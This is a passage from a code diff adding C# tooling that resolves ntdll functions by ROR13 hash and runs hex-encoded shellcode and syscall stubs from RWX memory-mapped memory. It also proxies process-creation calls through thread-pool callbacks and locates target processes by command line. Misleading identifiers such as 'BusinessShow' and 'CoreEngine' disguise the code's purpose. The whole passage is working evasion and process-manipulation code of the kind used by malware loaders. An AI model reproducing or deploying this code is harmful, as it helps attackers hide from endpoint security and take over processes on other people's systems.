     737 +
     738 + [StructLayout(LayoutKind.Sequential)]
     739 + public struct PsAttributeList
     740 + {
     741 + private const int PsAttributeListSize = 3;
     742 +
     743 + public UIntPtr TotalLength;
     744 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = PsAttributeListSize)]
     745 + public PsAtrribute[] Attributes;
     746 +
     747 + public void Init()
     748 + {
     749 + Attributes = new PsAtrribute[PsAttributeListSize];
     750 + }
     751 + }
     752 +
     753 + public enum TP_CALLBACK_PRIORITY : uint
     754 + {
     755 + TP_CALLBACK_PRIORITY_HIGH = 2,
     756 + TP_CALLBACK_PRIORITY_NORMAL = 0,
     757 + TP_CALLBACK_PRIORITY_LOW = 1
     758 + }
     759 +
     760 + public static IntPtr CreatePtr( object arg )
     761 + {
     762 + IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf( arg ));
     763 + Marshal.StructureToPtr( arg, ptr, false );
     764 + return ptr;
     765 + }
     766 +
     767 + // TpAllocWork
     768 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     769 + public delegate void TpAllocWorkX( out IntPtr WorkReturn, CallBackDelegate Callback, ref IntPtr Context, IntPtr Environment );
     770 + public static void TpAllocWork( out IntPtr WorkReturn, CallBackDelegate Callback, ref IntPtr Context, IntPtr Environment )
     771 + {
     772 + var CoreEngine = CoreEngine<TpAllocWorkX>( CoreExport( "1950996984" ) );
     773 + CoreEngine( out WorkReturn, Callback, ref Context, Environment );
     774 + }
     775 +
     776 + // TpAllocWork
     777 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     778 + public delegate void TpWaitForWorkX( IntPtr WorkReturn, ulong LOGICAL );
     779 + public static void TpWaitForWork( IntPtr WorkReturn, ulong LOGICAL )
     780 + {
     781 + var CoreEngine = CoreEngine<TpWaitForWorkX>( CoreExport( "1553094713" ) );
     782 + CoreEngine( WorkReturn, LOGICAL );
     783 + }
     784 +
     785 + // TpPostWork
     786 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     787 + public delegate void TpPostWorkX( IntPtr Work, TP_CALLBACK_PRIORITY Priority );
     788 + public static void TpPostWork( IntPtr Work, TP_CALLBACK_PRIORITY Priority )
     789 + {
     790 + var CoreEngine = CoreEngine<TpPostWorkX>( CoreExport( "-1554643355" ) );
     791 + CoreEngine( Work, Priority );
     792 + }
     793 +
     794 + // TpReleaseWork
     795 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     796 + public delegate void TpReleaseWorkX( IntPtr Work );
     797 + public static void TpReleaseWork( IntPtr Work )
     798 + {
     799 + var CoreEngine = CoreEngine<TpReleaseWorkX>( CoreExport( "536716890" ) );
     800 + CoreEngine( Work );
     801 + }
     802 +
     803 + // ZwGetNextThread
     804 + public delegate NTSTATUS CoreEngineThreadNext( IntPtr ProcessHandle, IntPtr ThreadHandle, uint /*ACCESS_MASK*/ DesiredAccess, ulong HandleAttributes, ulong BusinessShow, out IntPtr BusinessMediaShow, string ErrorCodea, string ErrorCodeb );
     805 + public static NTSTATUS CoreNextT( string buffer1, string buffer2, string buffer3, IntPtr ProcessHandle, IntPtr ThreadHandle, uint /*ACCESS_MASK*/ DesiredAccess, ulong HandleAttributes, ulong BusinessShow, out IntPtr BusinessMediaShow )
     806 + {
     807 + var CoreEngine = CoreEngine<CoreEngineThreadNext>( EngineVal( "-1976793764" ) );
     808 + return CoreEngine( ProcessHandle, ThreadHandle, DesiredAccess, HandleAttributes, BusinessShow, out BusinessMediaShow, "a", "b" );
     809 + }
     810 +
     811 + // ZwGetNextProcess
     812 + public delegate NTSTATUS CoreEngineNext( IntPtr ProcessHandle, uint /*ACCESS_MASK*/ DesiredAccess, CORE_Flags HandleAttributes, ulong BusinessShow, out IntPtr NewBusinessMedia, string ErrorCodea, string ErrorCodeb );
     813 + public static NTSTATUS CoreNext( string buffer1, string buffer2, string buffer3, IntPtr ProcessHandle, uint /*ACCESS_MASK*/ DesiredAccess, CORE_Flags HandleAttributes, ulong BusinessShow, out IntPtr NewBusinessMedia )
     814 + {
     815 + var CoreEngine = CoreEngine<CoreEngineNext>( EngineVal( "659301084" ) );
     816 + return CoreEngine( ProcessHandle, DesiredAccess, HandleAttributes, BusinessShow, out NewBusinessMedia, "a", "b" );
     817 + }
     818 +
     819 + // ZwQueryInformationProcess
     820 + public delegate NTSTATUS CoreEngineQuery( IntPtr ProcessHandle, CORE_INFORMATION_CLASS ProcessInformationClass, out CORE_BASIS PBI, int ProcessInformationLength, out int BusinessShowForRunners, string ErrorCodea, string ErrorCodeb );
     821 + public static NTSTATUS CoreQuery( string buffer1, string buffer2, string buffer3, IntPtr ProcessHandle, CORE_INFORMATION_CLASS ProcessInformationClass, out CORE_BASIS PBI, int ProcessInformationLength, out int BusinessShowForRunners )
     822 + {
     823 + var CoreEngine = CoreEngine<CoreEngineQuery>( EngineVal( "-1318067143" ) );
     824 + return CoreEngine( ProcessHandle, ProcessInformationClass, out PBI, ProcessInformationLength, out BusinessShowForRunners, "a", "b" );
     825 + }
     826 +
     827 + public delegate NTSTATUS CoreEngineReadB( IntPtr BusinessMedia, IntPtr Buffer, [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] string buf, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail, string ErrorCodea, string ErrorCodeb );
     828 + public static NTSTATUS CoreReadB( string buffer1, string buffer2, string buffer3, IntPtr BusinessMedia, IntPtr Buffer, [System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)] string buf, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail )
     829 + {
     830 + var CoreEngine = CoreEngine<CoreEngineReadB>( EngineVal( "1039115714" ) );
     831 + return CoreEngine( BusinessMedia, Buffer, buf, BusinessShowForRunnersOnTrailAnd, BusinessShowForRunnersOnTrail, "a", "b" );
     832 + }
     833 +
     834 + public delegate NTSTATUS CoreEngineReadA( IntPtr BusinessMedia, IntPtr BaseAddress, out IntPtr Buffer, UInt32 BusinessShowForRunnersOnTrailAnd, ref UInt32 BusinessShowForRunnersOnTrail, string ErrorCodea, string ErrorCodeb );
     835 + public static NTSTATUS CoreRead( string buffer1, string buffer2, string buffer3, IntPtr BusinessMedia, IntPtr BaseAddress, out IntPtr Buffer, UInt32 BusinessShowForRunnersOnTrailAnd, ref UInt32 BusinessShowForRunnersOnTrail )
     836 + {
     837 + var CoreEngine = CoreEngine<CoreEngineReadA>( EngineVal( "1039115714" ) );
     838 + return CoreEngine( BusinessMedia, BaseAddress, out Buffer, BusinessShowForRunnersOnTrailAnd, ref BusinessShowForRunnersOnTrail, "a", "b" );
     839 + }
     840 +
     841 + public delegate NTSTATUS CoreEngineRead( IntPtr BusinessMedia, IntPtr BaseAddress, out UNICODE_STRING Buffer, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail, string ErrorCodea, string ErrorCodeb );
     842 + public static NTSTATUS CoreReadA( string buffer1, string buffer2, string buffer3, IntPtr BusinessMedia, IntPtr BaseAddress, out UNICODE_STRING Buffer, IntPtr BusinessShowForRunnersOnTrailAnd, IntPtr BusinessShowForRunnersOnTrail )
     843 + {
     844 + var CoreEngine = CoreEngine<CoreEngineRead>( EngineVal( "1039115714" ) );
     845 + return CoreEngine( BusinessMedia, BaseAddress, out Buffer, BusinessShowForRunnersOnTrailAnd, BusinessShowForRunnersOnTrail, "a", "b" );
     846 + }
     847 +
     848 + // ZwResumeThread
     849 + public delegate NTSTATUS CoreResumeX( IntPtr Thread, out ulong SuspendCount );
     850 + public static NTSTATUS CoreResume( IntPtr Thread, out ulong SuspendCount )
     851 + {
     852 + var CoreEngine = CoreEngine<CoreResumeX>( EngineVal( "-884324616" ) );
     853 + return CoreEngine( Thread, out SuspendCount );
     854 + }
     855 +
     856 + // ZwCreateUserProcess
     857 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     858 + public delegate NTSTATUS CoreCreateProcessX( ref IntPtr processHandle, ref IntPtr threadHandle, long processDesiredAccess, long threadDesiredAccess, IntPtr processObjectAttributes, IntPtr threadObjectAttributes, uint processFlags, uint threadFlags, IntPtr processParameters, ref PsCreateInfo psCreateInfo, ref PsAttributeList psAttributeList );
     859 + public static NTSTATUS CoreCreateProcess( ref IntPtr processHandle, ref IntPtr threadHandle, long processDesiredAccess, long threadDesiredAccess, IntPtr processObjectAttributes, IntPtr threadObjectAttributes, uint processFlags, uint threadFlags, IntPtr processParameters, ref PsCreateInfo psCreateInfo, ref PsAttributeList psAttributeList )
     860 + {
     861 + var CoreEngine = CoreEngine<CoreCreateProcessX>( EngineVal( "-185512144" ) );
     862 + return CoreEngine( ref processHandle, ref threadHandle, processDesiredAccess, threadDesiredAccess, processObjectAttributes, threadObjectAttributes, processFlags, threadFlags, processParameters, ref psCreateInfo, ref psAttributeList );
     863 + }
     864 +
     865 + // RtlCreateProcessParametersEx
     866 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     867 + public delegate NTSTATUS CoreCreateParmsX( out IntPtr processParameters, IntPtr imagePathName, IntPtr dllPath, IntPtr currentDirectory, IntPtr commandLine, IntPtr environment, IntPtr windowTitle, IntPtr desktopInfo, IntPtr shellInfo, IntPtr runtimeData, ulong flags );
     868 + public static NTSTATUS CoreCreateParms( out IntPtr processParameters, IntPtr imagePathName, IntPtr dllPath, IntPtr currentDirectory, IntPtr commandLine, IntPtr environment, IntPtr windowTitle, IntPtr desktopInfo, IntPtr shellInfo, IntPtr runtimeData, ulong flags )
     869 + {
     870 + byte[] bytes = new byte[12];
     871 + Buffer.BlockCopy ((byte[])BitConverter.GetBytes( (Int64)CoreReturnFuncAddr( "-437962438" ) ), 0, bytes, 2, 8);
     872 + bytes[0] = 0x48; // movabs rax, FunctionPtr
     873 + bytes[1] = 0xB8;
     874 + bytes[10] = 0xFF; // jmp rax
     875 + bytes[11] = 0xE0;
     876 + var CoreEngine = CoreEngine<CoreCreateParmsX>( bytes );
     877 + return CoreEngine( out processParameters, imagePathName, dllPath, currentDirectory, commandLine, environment, windowTitle, desktopInfo, shellInfo, runtimeData, flags );
     878 + }
     879 +
     880 + // RtlDestroyProcessParameters
     881 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     882 + public delegate NTSTATUS CoreDestroyParmsX( IntPtr processParameters );
     883 + public static NTSTATUS CoreDestroyParms( IntPtr processParameters )
     884 + {
     885 + byte[] bytes = new byte[12];
     886 + Buffer.BlockCopy ((byte[])BitConverter.GetBytes( (Int64)CoreReturnFuncAddr( "90443789" ) ), 0, bytes, 2, 8);
     887 + bytes[0] = 0x48; // movabs rax, FunctionPtr
     888 + bytes[1] = 0xB8;
     889 + bytes[10] = 0xFF; // jmp rax
     890 + bytes[11] = 0xE0;
     891 + var CoreEngine = CoreEngine<CoreDestroyParmsX>( bytes );
     892 + return CoreEngine( processParameters );
     893 + }
     894 +
     895 + // ZwDelayExecution
     896 + public delegate NTSTATUS NappingX( bool Alertable, IntPtr dwMilliseconds );
     897 + public static NTSTATUS Napping( bool Alertable, IntPtr dwMilliseconds )
     898 + {
     899 + var CoreEngine = CoreEngine<NappingX>( EngineVal( "1425089620" ) );
     900 + return CoreEngine( Alertable, dwMilliseconds );
     901 + }
     902 +
     903 + // ZwWaitForSingleObject
     904 + public delegate NTSTATUS ZwWaitForSingleObjectX( IntPtr hHandle, bool Alertable, LARGE_INTEGER dwMilliseconds );
     905 + public static NTSTATUS ZwWaitForSingleObject( IntPtr hHandle, bool Alertable, LARGE_INTEGER dwMilliseconds )
     906 + {
     907 + var CoreEngine = CoreEngine<ZwWaitForSingleObjectX>( EngineVal( "1845938099" ) );
     908 + return CoreEngine( hHandle, Alertable, dwMilliseconds );
     909 + }
     910 +
     911 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     912 + public delegate void CallBackDelegate(IntPtr Instance, IntPtr Context, IntPtr Work);
     913 +
     914 +
     915 + // Find function by hash in ntdll.dll and return memory address
     916 + public static IntPtr CoreReturnFuncAddr( string hash )
     917 + {
     918 +
     919 + IntPtr ModuleBase = (IntPtr)ptrToGS;
     920 + IntPtr FunctionPtr = IntPtr.Zero;
     921 + Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
     922 + Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
     923 + Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
     924 + Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
     925 + Int64 pExport = OptHeader + 0x70;
     926 + Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
     927 + Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
     928 + Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
     929 + Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
     930 + Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
     931 + Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
     932 + Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
     933 +
     934 + for (int i = 0; i < NumberOfNames; i++)
     935 + {
     936 + // ROR13 hash calc
     937 + uint functionHash = 0;
     938 + foreach ( char ch in Marshal.PtrToStringAnsi( (IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))) )
     939 + {
     940 + uint ii = (uint)ch;
     941 + functionHash = ((functionHash >> 13 | functionHash << (32 - 13)) & 0xFFFFFFFF);
     942 + functionHash = (functionHash + ii);
     943 + }
     944 + if ( ( (int)(functionHash & 0xFFFFFFFF) ) == Convert.ToInt64(hash) )
     945 + {
     946 + Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
     947 + Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
     948 + FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
     949 + break;
     950 + }
     951 + }
     952 + return FunctionPtr;
     953 + }
     954 +
     955 + // Get ntdll.dll base address from memory (Only 64 bit)
     956 + [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
     957 + public delegate ulong ResolveBaseX( ref ulong ptrToGS );
     958 + public static ulong ResolveBase( ref ulong ptrToGS )
     959 + {
     960 + string HelperStr =
     961 + "5251555049C7C36C0700004D89DF4D39FB0F85BE00000049FFC349FFC34983EB0249C7C36C0700004D89DF4D39FB0F85A10000004983EB0349C7C36C0700004D89DF4D39FB0F858A0000004983EB0141B934000000EB4849C7C36C0700004D89DF4D39FB756F49FFC39090904983EB024983EB034983EB0165488B042560000000488B4018488B4020488B00488B40204889C2488B4D70488911585D595AC349C7C36C0700004D89DF4D39FB752749FFC341B90D0000004983EB064983EB0349C7C36C0700004D89DF4D39FB75074983EB0890EB3C49C7C36C0700004D89DF4D39FB75F14983EB024983EB034983EB0149FFC349C7C36C0700004D89DF4D39FB75D349C7C61000000049C7C712000000C349C7C36C0700004D89DF4D39FB75B549FFC34983EB094983EB034983EB024983EB064983EB104983EB1249C7C36C0700004D89DF4D39FB758B4989C490E904FFFFFF";
     962 + byte[] bytes = new byte[HelperStr.Length / 2];
     963 + int idx = 0;
     964 + for (int i = 0; i <= (HelperStr.Length / 2)-1; i++)
     965 + {
     966 + bytes[i] = Convert.ToByte(HelperStr.Substring(idx, 2), 16);
     967 + idx = idx + 2;
     968 + }
     969 + var Core = CoreEngine<ResolveBaseX>( bytes );
     970 + return Core( ref ptrToGS );
     971 + }
     972 +
     973 + // Find function by hash in ntdll.dll and return memory address
     974 + public static byte[] CoreExport( string hash )
     975 + {
     976 +
     977 + byte[] bytes = new byte[12];
     978 + IntPtr ModuleBase = (IntPtr)ptrToGS;
     979 + IntPtr FunctionPtr = IntPtr.Zero;
     980 + Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
     981 + Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
     982 + Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
     983 + Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
     984 + Int64 pExport = OptHeader + 0x70;
     985 + Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
     986 + Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
     987 + Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
     988 + Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
     989 + Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
     990 + Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
     991 + Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
     992 +
     993 + for (int i = 0; i < NumberOfNames; i++)
     994 + {
     995 + // ROR13 hash calc
     996 + uint functionHash = 0;
     997 + foreach ( char ch in Marshal.PtrToStringAnsi( (IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))) )
     998 + {
     999 + uint ii = (uint)ch;
     1000 + functionHash = ((functionHash >> 13 | functionHash << (32 - 13)) & 0xFFFFFFFF);
     1001 + functionHash = (functionHash + ii);
     1002 + }
     1003 + if ( ( (int)(functionHash & 0xFFFFFFFF) ) == Convert.ToInt64(hash) )
     1004 + {
     1005 + Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
     1006 + Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
     1007 + FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
     1008 + Buffer.BlockCopy ((byte[])BitConverter.GetBytes( (Int64)FunctionPtr ), 0, bytes, 2, 8);
     1009 + bytes[0] = 0x48; // movabs rax, FunctionPtr
     1010 + bytes[1] = 0xB8;
     1011 + bytes[10] = 0xFF; // jmp rax
     1012 + bytes[11] = 0xE0;
     1013 + break;
     1014 + }
     1015 + }
     1016 + return bytes;
     1017 + }
     1018 +
     1019 + // Create memory mapped RWX file
     1020 + public static unsafe START CoreEngine<START>(byte[] buffer) where START : class
     1021 + {
     1022 + try
     1023 + {
     1024 + // https://docs.microsoft.com/en-us/dotnet/api/system.io.memorymappedfiles.memorymappedfile.createnew?view=net-5.0
     1025 + MemMapSystemMem = System.IO.MemoryMappedFiles.MemoryMappedFile.CreateNew( Guid.NewGuid().ToString(), buffer.Length, (System.IO.MemoryMappedFiles.MemoryMappedFileAccess)5 );
     1026 + MemMapViewAccessor = MemMapSystemMem.CreateViewAccessor( 0, buffer.Length, (System.IO.MemoryMappedFiles.MemoryMappedFileAccess)5 );
     1027 + MemMapViewAccessor.WriteArray(0, buffer, 0, buffer.Length);
     1028 + byte* String = (byte*)IntPtr.Zero; // (byte*)0;
     1029 + MemMapViewAccessor.SafeMemoryMappedViewHandle.AcquirePointer(ref String);
     1030 + return (START)(object)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer( (IntPtr)String, typeof(START) );
     1031 + }
     1032 + catch
     1033 + {
     1034 + return null;
     1035 + }
     1036 + finally
     1037 + {
     1038 + //MemMapSystemMem.Dispose();
     1039 + //MemMapViewAccessor.Dispose();
     1040 + }
     1041 + }
     1042 +
     1043 + public static byte [] EngineVal( string hash )
     1044 + {
     1045 +
     1046 + IntPtr ModuleBase = (IntPtr)ptrToGS;
     1047 + byte[] opcode = new byte[] { 0x0, 0x0 };
     1048 + IntPtr FunctionPtr = IntPtr.Zero;
     1049 + Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
     1050 + Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
     1051 + Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
     1052 + Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
     1053 + Int64 pExport = OptHeader + 0x70;
     1054 + Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
     1055 + Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
     1056 + Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
     1057 + Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
     1058 + Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
     1059 + Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
     1060 + Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
     1061 +
     1062 + for (int i = 0; i < NumberOfNames; i++)
     1063 + {
     1064 + // ROR13 hash calc
     1065 + uint functionHash = 0;
     1066 + foreach ( char ch in Marshal.PtrToStringAnsi( (IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))) )
     1067 + {
     1068 + uint ii = (uint)ch;
     1069 + functionHash = ((functionHash >> 13 | functionHash << (32 - 13)) & 0xFFFFFFFF);
     1070 + functionHash = (functionHash + ii);
     1071 + }
     1072 + if ( ( (int)(functionHash & 0xFFFFFFFF) ) == Convert.ToInt64(hash) )
     1073 + {
     1074 + Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
     1075 + Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
     1076 + FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
     1077 + opcode[0] = Marshal.ReadByte( FunctionPtr + 4);
     1078 + opcode[1] = Marshal.ReadByte( FunctionPtr + 5);
     1079 + break;
     1080 + }
     1081 + }
     1082 +
     1083 + string Helper = "49C7C36C0700004D89DF4D39FB0F85A600000049FFC3B80000000049FFC34983EB0249C7C36C0700004D89DF4D39FB0F85840000004983EB0349C7C36C0700004D89DF4D39FB75714983EB014889CBEB3149C7C36C0700004D89DF4D39FB755949FFC34989DA48B80000000000000000FFE09090904983EB024983EB034983EB01C349C7C36C0700004D89DF4D39FB752849FFC348C7C02D0400004983EB064983EB0349C7C36C0700004D89DF4D39FB75074983EB0890EB3C49C7C36C0700004D89DF4D39FB75F14983EB024983EB034983EB0149FFC349C7C36C0700004D89DF4D39FB75D349C7C61000000049C7C712000000C349C7C36C0700004D89DF4D39FB75B549FFC34983EB094983EB034983EB024983EB064983EB104983EB1249C7C36C0700004D89DF4D39FB758B482DE8030000E918FFFFFF";
     1084 + byte[] bytes = new byte[Helper.Length / 2];
     1085 + int idx = 0;
     1086 + for (int i = 0; i <= (Helper.Length / 2)-1; i++)
     1087 + {
     1088 + bytes[i] = Convert.ToByte(Helper.Substring(idx, 2), 16);
     1089 + idx = idx + 2;
     1090 + }
     1091 + byte[] buffer = (byte[])BitConverter.GetBytes( (Int32)(BitConverter.ToInt16( opcode, 0 ) + 1000 ) );
     1092 + bytes[23] = buffer[0]; bytes[24] = buffer[1]; bytes[25] = buffer[2]; bytes[26] = buffer[3];
     1093 + buffer = (byte[])BitConverter.GetBytes( (Int64)FunctionPtr );
     1094 + bytes[104] = buffer[0]; bytes[105] = buffer[1]; bytes[106] = buffer[2]; bytes[107] = buffer[3]; bytes[108] = buffer[4]; bytes[109] = buffer[5]; bytes[110] = buffer[6]; bytes[111] = buffer[7];
     1095 + return bytes;
     1096 + }
     1097 +
     1098 + static void WorkCallback_CoreDestroyParms(IntPtr Instance, IntPtr Context, IntPtr Work)
     1099 + {
     1100 + CoreDestroyParms( ProcessParams );
     1101 + }
     1102 +
     1103 + static void WorkCallback_CoreResume(IntPtr Instance, IntPtr Context, IntPtr Work)
     1104 + {
     1105 + CoreResume( NewRemoteThread, out SuspendCount );
     1106 + }
     1107 +
     1108 + static void WorkCallback_CoreCreateParms(IntPtr Instance, IntPtr Context, IntPtr Work)
     1109 + {
     1110 + CoreCreateParms( out ProcessParams , PtrToImagePath, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, 0x00000001 );
     1111 + }
     1112 +
     1113 + static void WorkCallback_CoreCreateProcess(IntPtr Instance, IntPtr Context, IntPtr Work)
     1114 + {
     1115 + CoreCreateProcess( ref RemoteProcess, ref NewRemoteThread, 0x1FFFFF, 0x1FFFFF, IntPtr.Zero, IntPtr.Zero, 0x00000000, 0x0000001, ProcessParams, ref info, ref attributeList );
     1116 + }
     1117 +
     1118 +
     1119 + // Find process
     1120 + public static int CoreFindProcess( ref IntPtr ProcessHandle, ref IntPtr NewRemoteThreadHandle, string arg1, string arg2, string arg3 )
     1121 + {
     1122 + ulong Flags = 0;
     1123 + for (int i = 0; i <= 1000; i++ ) // make sure we don't loop forever
     1124 + {
     1125 + // ZwGetNextProcess
     1126 + CoreNext( "a", "b", "c", ProcessHandle, 0x10000000 /*0x10000000 ACCESS_MASK.GENERIC_ALL*/, CORE_Flags.None, Flags, out ProcessHandle );
     1127 + try
     1128 + {
     1129 + CORE_BASIS PBI = new CORE_BASIS();
     1130 + int ReturnLength = 0;
     1131 + // ZwQueryInformationProcess
     1132 + CoreQuery( "a", "b", "c", ProcessHandle, CORE_INFORMATION_CLASS.ProcessBasicInformation, out PBI, System.Runtime.InteropServices.Marshal.SizeOf( PBI ), out ReturnLength );
     1133 + long PEBaddress = PBI.PebBaseAddress.ToInt64();
     1134 + IntPtr PtrToStructure = new IntPtr();
     1135 + UInt32 NumberOfBytesRead = 0;
     1136 + UInt32 NumberOfBytesToRead = (UInt32)System.Runtime.InteropServices.Marshal.SizeOf( PtrToStructure );
     1137 + // ZwReadVirtualMemory
     1138 + CoreRead( "a", "b", "c", ProcessHandle, new IntPtr(PEBaddress + 0x20), out PtrToStructure, NumberOfBytesToRead, ref NumberOfBytesRead );
     1139 + UNICODE_STRING UnicodeStringCommandLine = new UNICODE_STRING();
     1140 + // ZwReadVirtualMemory
     1141 + CoreReadA( "a", "b", "c", ProcessHandle, new IntPtr((long)PtrToStructure + 0x70), out UnicodeStringCommandLine, new IntPtr(System.Runtime.InteropServices.Marshal.SizeOf(UnicodeStringCommandLine)), IntPtr.Zero );
     1142 + string StringCommandLine = new string('\0', UnicodeStringCommandLine.Length / 2);
     1143 + // ZwReadVirtualMemory
     1144 + CoreReadB( "a", "b", "c", ProcessHandle, (IntPtr)UnicodeStringCommandLine.Buffer, StringCommandLine, new IntPtr(UnicodeStringCommandLine.Length), IntPtr.Zero );
     1145 + StringCommandLine = StringCommandLine.ToLower();
     1146 + if (StringCommandLine.Contains( arg1.ToLower() ) & StringCommandLine.Contains( arg2.ToLower() ) & StringCommandLine.Contains( arg3.ToLower() ))
     1147 + {
     1148 + // ZwGetNextThread
     1149 + CoreNextT( "a", "b", "c", ProcessHandle, NewRemoteThreadHandle, 267386880+1048576 /*ACCESS_MASK.GENERIC_ALL*/, 0, 0, out NewRemoteThreadHandle );
     1150 + break;
     1151 + }
     1152 + }
     1153 + catch (Exception e)
     1154 + {
     1155 + Console.WriteLine( "status: {0}", e.Message );
     1156 + }
     1157 + }
     1158 + return 0;
     1159 + }
     1160 +
     1161 + static void Main()
     1162 + {
     1163 +
     1164 + IntPtr PtrZero = IntPtr.Zero;
     1165 + IntPtr SpoofedProcess = IntPtr.Zero;
     1166 + IntPtr SpoofedThread = IntPtr.Zero;
     1167 + ResolveBase( ref ptrToGS );
     1168 + CoreFindProcess( ref SpoofedProcess, ref SpoofedThread, "cmd.exe", "spoofed", "");
     1169 + CoreFindProcess( ref RemoteProcess, ref NewRemoteThread, "cmd.exe", "remote", "");
     1170 + ImagePath = ConvertToUnicode(String.Format("\\??\\{0}", "C:\\Windows\\System32\\cmd.exe"));
     1171 + ProcessParams = CreatePtr( ProcessParams64 );
     1172 + PtrToImagePath = CreatePtr( ImagePath );
     1173 +
     1174 + info = new PsCreateInfo();
     1175 + info.Size = (UIntPtr)Marshal.SizeOf<PsCreateInfo>();
     1176 + info.State = PsCreateState.PsCreateInitialState;
     1177 + attributeList = new PsAttributeList();
     1178 + attributeList.Init();
     1179 +
     1180 + attributeList.TotalLength = (UIntPtr)Marshal.SizeOf<PsAttributeList>();
     1181 + attributeList.Attributes[0].Attribute = 0x20005;
     1182 + attributeList.Attributes[0].Size = (UIntPtr)ImagePath.Length;
